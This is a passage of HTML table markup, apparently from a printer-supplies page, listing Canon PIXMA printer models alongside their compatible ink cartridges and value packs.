(Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6870</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2570S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2577S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\"><tbody><tr align=\"center\"><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MG3570</td><td>CL-741 (Colour)</td></tr><tr><td>CL-741XL (Colour)</td></tr><tr><td>PG-740 (Pigment Black)</td></tr><tr><td>PG-740/CL-741 Value Pack</td></tr><tr><td>PG-740XL (Pigment Black)</td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MG3670</td><td>CL-741 (Colour)</td></tr><tr><td>CL-741XL (Colour)</td></tr><tr><td>PG-740 (Pigment Black)</td></tr><tr><td>PG-740/CL-741 Value Pack</td></tr><tr><td>PG-740XL (Pigment Black)</td></tr><tr><td rowspan=\"10\" align=\"center\">PIXMA MG7570</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Gray)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Gray)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP160</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP170</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP180</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MP228</td><td>CL-41 (Colour)</td></tr><tr><td>CL-831 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td>PG-830 (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP237</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP245</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP258</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP276</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr></tbody></table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP287</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA MP460</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP476</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>CL-831 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td>PG-830 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP486</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP496</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP497</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP500</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA MP520</td>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP530</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP568</td>\n<td>CLI-821 (Black)</td>\n</tr>\n<tr>\n<td>CLI-821 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-821 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-821 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-820 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP600</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table width=\"378\">\n<tbody>\n<tr>\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA MP610</td>\n<td width=\"208\">CLI-8 (Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA MP628</td>\n<td width=\"208\">CLI-821 (Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-820 (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA MP638</td>\n<td width=\"208\">CLI-821 (Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-820 (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA MP648</td>\n<td width=\"208\">CLI-821 (Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-820 (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA MP800</td>\n<td width=\"208\">CLI-8 (Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA MP800R</td>\n<td width=\"208\">CLI-8 (Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA MP810</td>\n<td width=\"208\">CLI-8 (Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA MP830</td>\n<td width=\"208\">CLI-8 (Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA MP970</td>\n<td width=\"208\">CLI-8 (Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Photo Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Photo Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA MP988</td>\n<td width=\"208\">CLI-821 (Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Gray)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-820 (Pigment Black)</td>\n</tr>\n<tr>\n<td width=\"170\">PIXMA MP996</td>\n<td width=\"208\">CLI-821 (Black)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Cyan)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Gray)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Magenta)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">CLI-821 (Yellow)</td>\n</tr>\n<tr>\n<td width=\"170\"></td>\n<td width=\"208\">PGI-820 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td 